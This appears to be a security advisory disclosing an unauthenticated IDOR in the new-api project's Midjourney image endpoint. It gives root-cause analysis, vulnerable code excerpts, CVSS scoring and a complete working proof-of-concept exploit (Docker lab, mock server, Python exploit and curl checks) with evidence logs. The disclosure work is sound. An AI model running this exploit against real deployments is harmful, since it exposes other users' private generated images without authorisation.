@YLChen-007
Created April 6, 2026 04:31
Unauthenticated IDOR in `/mj/image/:id` Allows Cross-User Midjourney Image Disclosure

Advisory Details

Title: Unauthenticated IDOR in /mj/image/:id Allows Cross-User Midjourney Image Disclosure

Description:

Summary

An authorization flaw in the Midjourney image relay endpoint allows an unauthenticated attacker to retrieve image content that belongs to other users.

The endpoint /mj/image/:id is reachable without TokenAuth, and the handler resolves tasks via mj_id only (GetByOnlyMJId) without user ownership validation. As a result, any attacker who can obtain or guess a valid mj_id can directly exfiltrate another user's generated image.

Details

The root cause is a two-part logic flaw:

  1. Missing authentication on endpoint

    • In router/relay-router.go, GET /mj/image/:id is registered on relayMjRouter before any middleware is attached to the group.
    • TokenAuth and Distribute are attached with Use only after this route is registered, so they do not run for it.
  2. Missing object-level authorization

    • RelayMidjourneyImage in relay/mjproxy_handler.go calls:
      • model.GetByOnlyMJId(taskId)
    • GetByOnlyMJId in model/midjourney.go performs WHERE mj_id = ? only.
    • There is no user_id binding in this code path.
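The ordering problem in part 1 can be modelled in a few lines. This is a simplified Python stand-in for a router group, not Gin's actual implementation; `RouterGroup`, `token_auth`, `relay_image`, and `fetch_task` are hypothetical names. It assumes, as in Gin, that a route captures the group's middleware chain at the moment it is registered, so middleware attached later never runs for it.

```python
from typing import Callable, Dict, List


class Unauthorized(Exception):
    """Raised by the toy auth middleware when no token is supplied."""


class RouterGroup:
    """Toy router: each route snapshots the middleware present at registration."""

    def __init__(self) -> None:
        self._middleware: List[Callable[[dict], None]] = []
        self._routes: Dict[str, List[Callable]] = {}

    def use(self, mw: Callable[[dict], None]) -> None:
        self._middleware.append(mw)

    def get(self, path: str, handler: Callable[[dict], str]) -> None:
        # Snapshot the chain: later use() calls do not affect this route.
        self._routes[path] = list(self._middleware) + [handler]

    def dispatch(self, path: str, request: dict) -> str:
        *middleware, handler = self._routes[path]
        for mw in middleware:
            mw(request)
        return handler(request)


def token_auth(request: dict) -> None:
    if not request.get("token"):
        raise Unauthorized("missing token")


def relay_image(request: dict) -> str:
    return "image-bytes"


def fetch_task(request: dict) -> str:
    return "task-json"


group = RouterGroup()
group.get("/image/:id", relay_image)      # registered before use(): no auth runs
group.use(token_auth)
group.get("/task/:id/fetch", fetch_task)  # registered after use(): auth enforced
```

In this model, dispatching `/image/:id` with an empty request succeeds, while `/task/:id/fetch` raises `Unauthorized`, which mirrors the 200 versus 401 behaviour recorded in the evidence logs.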

Execution flow:

Attacker -> GET /mj/image/{victim_mj_id} (no token)
         -> RelayMidjourneyImage
         -> GetByOnlyMJId(victim_mj_id)
         -> server-side GET midjourneyTask.ImageUrl
         -> io.Copy(...) stream image to attacker

Relevant vulnerable snippets:

// router/relay-router.go
relayMjRouter.GET("/image/:id", relay.RelayMidjourneyImage)
relayMjRouter.Use(middleware.TokenAuth(), middleware.Distribute())

// relay/mjproxy_handler.go (excerpt)
taskId := c.Param("id")
midjourneyTask := model.GetByOnlyMJId(taskId)
// ...
resp, err := httpClient.Get(midjourneyTask.ImageUrl)
// ...
_, err = io.Copy(c.Writer, resp.Body)

// model/midjourney.go (excerpt)
func GetByOnlyMJId(mjId string) *Midjourney {
    // ...
    err = DB.Where("mj_id = ?", mjId).First(&mj).Error
    // ...
}
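
The difference between an ID-only lookup and a user-scoped lookup can be illustrated with a small in-memory database. This is a Python sketch, not the project's Go code: the table name `midjourneys`, its columns, and the sample row are assumptions, and `get_by_mj_id` only approximates what a user-scoped query such as GetByMJId(userId, mjId) is expected to do.

```python
import sqlite3
from typing import Optional


def make_db() -> sqlite3.Connection:
    """Create a hypothetical task table holding one task owned by user 1."""
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE midjourneys (user_id INTEGER, mj_id TEXT, image_url TEXT)"
    )
    db.execute(
        "INSERT INTO midjourneys VALUES (?, ?, ?)",
        (1, "victim-task", "https://example.invalid/victim.jpg"),
    )
    return db


def get_by_only_mj_id(db: sqlite3.Connection, mj_id: str) -> Optional[str]:
    # ID-only lookup: any caller who knows mj_id gets the row.
    row = db.execute(
        "SELECT image_url FROM midjourneys WHERE mj_id = ?", (mj_id,)
    ).fetchone()
    return row[0] if row else None


def get_by_mj_id(db: sqlite3.Connection, user_id: int, mj_id: str) -> Optional[str]:
    # User-scoped lookup: the row is returned only to its owner.
    row = db.execute(
        "SELECT image_url FROM midjourneys WHERE user_id = ? AND mj_id = ?",
        (user_id, mj_id),
    ).fetchone()
    return row[0] if row else None
```

With this data, `get_by_only_mj_id(db, "victim-task")` returns the victim's URL to anyone, whereas `get_by_mj_id(db, 2, "victim-task")` returns `None` for a different user. A scoped lookup presupposes that the request has been authenticated, since the caller's user ID must come from a verified token.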

PoC

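The following PoC reproduces the issue from an external network perspective. It is self-contained apart from Docker, the Python requests package, and outbound access to httpbin.org, which serves as the stand-in victim image.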

  1. Save the following as docker-compose.yml:
version: "3.8"

services:
  new-api:
    image: calciumion/new-api:latest
    restart: unless-stopped
    command: --log-dir /app/logs
    ports:
      - "3301:3000"
    environment:
      SQL_DSN: postgresql://root:123456@postgres:5432/new-api
      REDIS_CONN_STRING: redis://redis
      TZ: UTC
      ERROR_LOG_ENABLED: "true"
      BATCH_UPDATE_ENABLED: "true"
    volumes:
      - ./data:/data
      - ./logs:/app/logs
    depends_on:
      - redis
      - postgres
      - mock-mj
    networks:
      - idor-net
    healthcheck:
      test: ["CMD-SHELL", "wget -q -O - http://localhost:3000/api/status | grep -o '\"success\":\\s*true' || exit 1"]
      interval: 20s
      timeout: 10s
      retries: 5

  redis:
    image: redis:latest
    restart: unless-stopped
    networks:
      - idor-net

  postgres:
    image: postgres:15
    restart: unless-stopped
    environment:
      POSTGRES_USER: root
      POSTGRES_PASSWORD: 123456
      POSTGRES_DB: new-api
    volumes:
      - pg_data:/var/lib/postgresql/data
    networks:
      - idor-net

  mock-mj:
    image: python:3.12-alpine
    restart: unless-stopped
    working_dir: /app
    command: ["python", "/app/mock_mj_server.py"]
    volumes:
      - ./mock_mj_server.py:/app/mock_mj_server.py:ro
    networks:
      - idor-net

volumes:
  pg_data:

networks:
  idor-net:
    driver: bridge
  2. Save the following as mock_mj_server.py:
from http.server import BaseHTTPRequestHandler, HTTPServer
import json
import time


class Handler(BaseHTTPRequestHandler):
    def log_message(self, fmt, *args):
        return

    def _json(self, code, payload):
        body = json.dumps(payload).encode("utf-8")
        self.send_response(code)
        self.send_header("Content-Type", "application/json")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def do_POST(self):
        if self.path == "/mj/submit/imagine":
            task_id = f"victim-mj-{int(time.time() * 1000)}"
            self._json(
                200,
                {
                    "code": 21,
                    "description": "task already exists",
                    "result": task_id,
                    "properties": {
                        "status": "SUCCESS",
                        "imageUrl": "https://httpbin.org/image/jpeg",
                    },
                },
            )
            return
        self._json(404, {"error": "not_found"})

    def do_GET(self):
        self._json(404, {"error": "not_found"})


if __name__ == "__main__":
    HTTPServer(("0.0.0.0", 80), Handler).serve_forever()
  3. Save the following as poc_exploit.py:
import json
import os
import sys
import time
import hashlib

import requests


BASE_URL = os.getenv("TARGET_URL", "http://127.0.0.1:3301").rstrip("/")
LOGIN_USER = os.getenv("LOGIN_USER", "root")
DEFAULT_SETUP_PASS = "12345678"
LOGIN_PASS = os.getenv("LOGIN_PASS", DEFAULT_SETUP_PASS)


def fail(msg):
    print(f"[FAIL] {msg}")
    sys.exit(1)


def expect_json(resp, step):
    try:
        return resp.json()
    except Exception:
        fail(f"{step}: non-json response status={resp.status_code} body={resp.text[:300]}")


def api_success(resp, step):
    body = expect_json(resp, step)
    if resp.status_code != 200 or not body.get("success"):
        fail(f"{step}: status={resp.status_code} body={json.dumps(body, ensure_ascii=True)}")
    return body


def find_token_id(items, token_name):
    candidates = [item for item in items if item.get("name") == token_name and item.get("id") is not None]
    if not candidates:
        return None
    candidates.sort(key=lambda x: int(x.get("id", 0)), reverse=True)
    return int(candidates[0]["id"])


def ensure_setup(session):
    resp = session.get(f"{BASE_URL}/api/setup", timeout=15)
    body = expect_json(resp, "get setup")
    if resp.status_code != 200 or not body.get("success"):
        fail(f"get setup failed: status={resp.status_code} body={json.dumps(body, ensure_ascii=True)}")
    data = body.get("data") or {}
    if data.get("status"):
        return LOGIN_PASS
    setup_pass = LOGIN_PASS if len(LOGIN_PASS) >= 8 else DEFAULT_SETUP_PASS
    setup_resp = session.post(
        f"{BASE_URL}/api/setup",
        json={
            "username": LOGIN_USER,
            "password": setup_pass,
            "confirmPassword": setup_pass,
            "SelfUseModeEnabled": False,
            "DemoSiteEnabled": False,
        },
        timeout=15,
    )
    setup_body = expect_json(setup_resp, "post setup")
    if setup_resp.status_code != 200 or not setup_body.get("success"):
        fail(f"post setup failed: status={setup_resp.status_code} body={json.dumps(setup_body, ensure_ascii=True)}")
    print("[+] Initialized target via /api/setup")
    return setup_pass


def login(session, password_candidates):
    for candidate in password_candidates:
        login_resp = session.post(
            f"{BASE_URL}/api/user/login",
            json={"username": LOGIN_USER, "password": candidate},
            timeout=15,
        )
        login_body = expect_json(login_resp, "login")
        if login_resp.status_code == 200 and login_body.get("success"):
            user_id = ((login_body.get("data") or {}).get("id"))
            if user_id is None:
                fail("login success but missing user id")
            print(f"[+] Logged in as {LOGIN_USER} via external API")
            return candidate, int(user_id)
    fail("login failed with all password candidates")


def clear_existing_channels(session):
    list_resp = session.get(f"{BASE_URL}/api/channel/?p=0&page_size=200", timeout=20)
    list_body = api_success(list_resp, "list channels")
    items = ((list_body.get("data") or {}).get("items") or [])
    for item in items:
        channel_id = item.get("id")
        if channel_id is None:
            continue
        del_resp = session.delete(f"{BASE_URL}/api/channel/{int(channel_id)}", timeout=20)
        del_body = expect_json(del_resp, f"delete channel {channel_id}")
        if del_resp.status_code != 200 or not del_body.get("success"):
            fail(f"delete channel {channel_id} failed: status={del_resp.status_code} body={json.dumps(del_body, ensure_ascii=True)}")


def main():
    session = requests.Session()

    setup_pass = ensure_setup(session)
    candidates = []
    for value in [setup_pass, LOGIN_PASS, DEFAULT_SETUP_PASS, "123456"]:
        if value and value not in candidates:
            candidates.append(value)
    _, user_id = login(session, candidates)
    session.headers.update({"New-Api-User": str(user_id)})

    ts = int(time.time())
    channel_name = f"idor-mj-channel-{ts}"
    clear_existing_channels(session)
    add_channel_resp = session.post(
        f"{BASE_URL}/api/channel/",
        json={
            "mode": "single",
            "channel": {
                "name": channel_name,
                "type": 2,
                "key": "mock-midjourney-key",
                "base_url": "http://mock-mj",
                "group": "default",
                "models": "mj_imagine",
                "status": 1,
            },
        },
        timeout=15,
    )
    api_success(add_channel_resp, "create channel")
    print(f"[+] Created Midjourney channel: {channel_name}")

    fix_resp = session.post(f"{BASE_URL}/api/channel/fix", json={}, timeout=15)
    api_success(fix_resp, "fix channel abilities")

    token_name = f"idor-mj-token-{ts}"
    add_token_resp = session.post(
        f"{BASE_URL}/api/token/",
        json={
            "name": token_name,
            "remain_quota": 100000000,
            "unlimited_quota": True,
            "expired_time": -1,
            "model_limits_enabled": False,
            "group": "default",
        },
        timeout=15,
    )
    api_success(add_token_resp, "create token")

    list_token_resp = session.get(f"{BASE_URL}/api/token/?p=0&page_size=100", timeout=15)
    list_token_body = api_success(list_token_resp, "list tokens")
    items = ((list_token_body.get("data") or {}).get("items") or [])
    token_id = find_token_id(items, token_name)
    if token_id is None:
        fail("unable to locate created token id")

    key_resp = session.post(f"{BASE_URL}/api/token/{token_id}/key", json={}, timeout=15)
    key_body = api_success(key_resp, "get token key")
    full_key = ((key_body.get("data") or {}).get("key") or "").strip()
    if not full_key:
        fail("empty token key")
    print(f"[+] Retrieved API token id={token_id}")

    submit_resp = session.post(
        f"{BASE_URL}/mj/submit/imagine",
        headers={"Authorization": f"Bearer {full_key}"},
        json={"prompt": "victim confidential render"},
        timeout=20,
    )
    submit_body = expect_json(submit_resp, "submit imagine")
    submit_code = int(submit_body.get("code", -1))
    if submit_resp.status_code != 200 or submit_code not in (1, 21):
        fail(f"submit failed: status={submit_resp.status_code} body={json.dumps(submit_body, ensure_ascii=True)}")

    mj_id = str(submit_body.get("result", "")).strip()
    if not mj_id:
        fail("submit response missing mj_id")
    print(f"[+] Victim task created with mj_id={mj_id}")

    exploit_resp = requests.get(f"{BASE_URL}/mj/image/{mj_id}", timeout=20)
    if exploit_resp.status_code != 200:
        fail(f"unauthenticated image fetch failed: status={exploit_resp.status_code} body={exploit_resp.text[:300]}")

    content_type = exploit_resp.headers.get("Content-Type", "")
    if "image" not in content_type.lower():
        fail(f"unexpected content type from leak endpoint: {content_type}")

    reference_resp = requests.get("https://httpbin.org/image/jpeg", timeout=20)
    if reference_resp.status_code != 200:
        fail(f"failed to fetch reference image: status={reference_resp.status_code}")

    leaked_hash = hashlib.sha256(exploit_resp.content).hexdigest()
    reference_hash = hashlib.sha256(reference_resp.content).hexdigest()
    if leaked_hash != reference_hash:
        fail("leaked response does not match expected victim image bytes")

    with open("stolen_image.jpg", "wb") as f:
        f.write(exploit_resp.content)

    with open("exploit_result.log", "w", encoding="utf-8") as f:
        f.write(f"target={BASE_URL}\n")
        f.write(f"mj_id={mj_id}\n")
        f.write(f"status={exploit_resp.status_code}\n")
        f.write(f"content_type={content_type}\n")
        f.write(f"bytes={len(exploit_resp.content)}\n")
        f.write(f"leaked_sha256={leaked_hash}\n")
        f.write(f"reference_sha256={reference_hash}\n")

    print("[EXPLOITED-EXTERNAL] Unauthenticated attacker retrieved victim image bytes")
    print(f"[+] Evidence saved: stolen_image.jpg, exploit_result.log (mj_id={mj_id})")


if __name__ == "__main__":
    main()
  4. (Optional but recommended control) Save the following as control-auth_enforced.py:
import os
import re
import sys

import requests


BASE_URL = os.getenv("TARGET_URL", "http://127.0.0.1:3301").rstrip("/")


def fail(msg):
    print(f"[FAIL] {msg}")
    sys.exit(1)


def load_mj_id():
    value = os.getenv("MJ_ID", "").strip()
    if value:
        return value
    if not os.path.exists("exploit_result.log"):
        return ""
    with open("exploit_result.log", "r", encoding="utf-8") as f:
        data = f.read()
    m = re.search(r"^mj_id=(.+)$", data, flags=re.MULTILINE)
    return m.group(1).strip() if m else ""


def main():
    mj_id = load_mj_id()
    if not mj_id:
        fail("missing mj_id; run poc_exploit.py first or set MJ_ID")

    resp = requests.get(f"{BASE_URL}/mj/task/{mj_id}/fetch", timeout=15)
    if resp.status_code not in (401, 403):
        fail(f"expected auth enforcement (401/403), got status={resp.status_code} body={resp.text[:300]}")

    with open("control_result.log", "w", encoding="utf-8") as f:
        f.write(f"target={BASE_URL}\n")
        f.write(f"mj_id={mj_id}\n")
        f.write(f"status={resp.status_code}\n")

    print("[CONTROL-BLOCKED] Protected Midjourney endpoint denied unauthenticated access")
    print(f"[+] Evidence saved: control_result.log (status={resp.status_code})")


if __name__ == "__main__":
    main()
  5. Run:
docker compose up -d
python3 poc_exploit.py
python3 control-auth_enforced.py
  6. Minimal direct HTTP verification:
MJ_ID=$(awk -F= '/^mj_id=/{print $2}' exploit_result.log)
curl -sS -o /tmp/mj_leak.jpg -w 'unauth_image_http=%{http_code} ct=%{content_type} bytes=%{size_download}\n' "http://127.0.0.1:3301/mj/image/$MJ_ID"
curl -sS -o /tmp/mj_control.txt -w 'unauth_task_http=%{http_code}\n' "http://127.0.0.1:3301/mj/task/$MJ_ID/fetch"

Log of Evidence

Runtime evidence from the PoC execution:

[+] Logged in as root via external API
[+] Created Midjourney channel: idor-mj-channel-1775211177
[+] Retrieved API token id=9
[+] Victim task created with mj_id=victim-mj-1775211177224
[EXPLOITED-EXTERNAL] Unauthenticated attacker retrieved victim image bytes
[CONTROL-BLOCKED] Protected Midjourney endpoint denied unauthenticated access

Generated logs:

# exploit_result.log
target=http://127.0.0.1:3301
mj_id=victim-mj-1775211177224
status=200
content_type=image/jpeg
bytes=35588
leaked_sha256=c028d7aa15e851b0eefb31638a1856498a237faf1829050832d3b9b19f9ab75f
reference_sha256=c028d7aa15e851b0eefb31638a1856498a237faf1829050832d3b9b19f9ab75f

# control_result.log
target=http://127.0.0.1:3301
mj_id=victim-mj-1775211177224
status=401

Manual curl verification:

unauth_image_http=200 ct=image/jpeg bytes=35588
unauth_task_http=401
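
The evidence above can also be checked mechanically. The following is a minimal sketch, assuming the key=value log layout shown in this section; `parse_kv` and `confirms_leak` are hypothetical helper names and are not part of the PoC scripts.

```python
def parse_kv(text: str) -> dict:
    """Parse key=value lines, skipping blanks and '#' comment lines."""
    result = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        result[key] = value
    return result


def confirms_leak(exploit: dict, control: dict) -> bool:
    """True when the image endpoint leaked bytes while the control was denied."""
    leaked = exploit.get("leaked_sha256")
    return (
        exploit.get("status") == "200"
        and exploit.get("content_type", "").startswith("image/")
        and leaked is not None
        and leaked == exploit.get("reference_sha256")
        and control.get("status") in ("401", "403")
    )
```

Feeding the contents of exploit_result.log and control_result.log through `parse_kv` and then `confirms_leak` yields `True` for the logs shown here, because the two hashes match and the control request was rejected with 401.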

Impact

This is an unauthenticated object-level authorization bypass (IDOR) leading to sensitive data disclosure.

  • Any external attacker can fetch another user's Midjourney image if a valid mj_id is known.
  • Cross-tenant data isolation is broken.
  • Private generated assets (designs, user-upload-derived images, potentially sensitive visual content) can be exfiltrated without credentials.

Affected products

  • Ecosystem: go
  • Package name: QuantumNous/new-api
  • Affected versions: Confirmed on v0.12.1 (and any build containing the same route registration order and the unscoped GetByOnlyMJId lookup)
  • Patched versions:

Severity

  • Severity: High
  • Vector string: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
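
For reference, the High rating can be reproduced from the vector string. The sketch below applies the CVSS v3.1 base score equations for the Scope: Unchanged case only, using the metric weights from the CVSS v3.1 specification; the function names are illustrative, and temporal and environmental metrics are not handled.

```python
import math

# CVSS v3.1 metric weights (PR values are those for Scope: Unchanged).
WEIGHTS = {
    "AV": {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2},
    "AC": {"L": 0.77, "H": 0.44},
    "PR": {"N": 0.85, "L": 0.62, "H": 0.27},
    "UI": {"N": 0.85, "R": 0.62},
    "CIA": {"H": 0.56, "L": 0.22, "N": 0.0},
}


def roundup(value: float) -> float:
    """Round up to one decimal place, as defined in the v3.1 specification."""
    scaled = round(value * 100000)
    if scaled % 10000 == 0:
        return scaled / 100000.0
    return (math.floor(scaled / 10000) + 1) / 10.0


def base_score_scope_unchanged(vector: str) -> float:
    # Drop the "CVSS:3.1" prefix, then split "AV:N" style pairs.
    metrics = dict(item.split(":") for item in vector.split("/")[1:])
    if metrics["S"] != "U":
        raise ValueError("this sketch only handles Scope: Unchanged")
    c, i, a = (WEIGHTS["CIA"][metrics[k]] for k in ("C", "I", "A"))
    iss = 1 - (1 - c) * (1 - i) * (1 - a)
    impact = 6.42 * iss
    exploitability = (
        8.22
        * WEIGHTS["AV"][metrics["AV"]]
        * WEIGHTS["AC"][metrics["AC"]]
        * WEIGHTS["PR"][metrics["PR"]]
        * WEIGHTS["UI"][metrics["UI"]]
    )
    if impact <= 0:
        return 0.0
    return roundup(min(impact + exploitability, 10))
```

For the vector above this gives an impact of about 3.60 and an exploitability of about 3.89, which rounds up to a base score of 7.5, inside the 7.0 to 8.9 band labelled High.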

Weaknesses

  • CWE: CWE-639: Authorization Bypass Through User-Controlled Key

Occurrences

Permalink | Description
--- | ---
https://github.com/QuantumNous/new-api/blob/main/router/relay-router.go#L203-L205 | /mj/image/:id is registered before TokenAuth middleware, leaving the endpoint unauthenticated.
https://github.com/QuantumNous/new-api/blob/main/relay/mjproxy_handler.go#L28-L53 | RelayMidjourneyImage reads path id, resolves task by ID only, and performs server-side fetch of the stored image URL.
https://github.com/QuantumNous/new-api/blob/main/relay/mjproxy_handler.go#L74-L76 | The response body is directly streamed to the requester, completing unauthorized data exfiltration.
https://github.com/QuantumNous/new-api/blob/main/model/midjourney.go#L104-L111 | GetByOnlyMJId uses WHERE mj_id = ? without user ownership checks.
https://github.com/QuantumNous/new-api/blob/main/model/midjourney.go#L114-L121 | A safer user-scoped query (GetByMJId(userId, mjId)) exists but is not used by /mj/image/:id.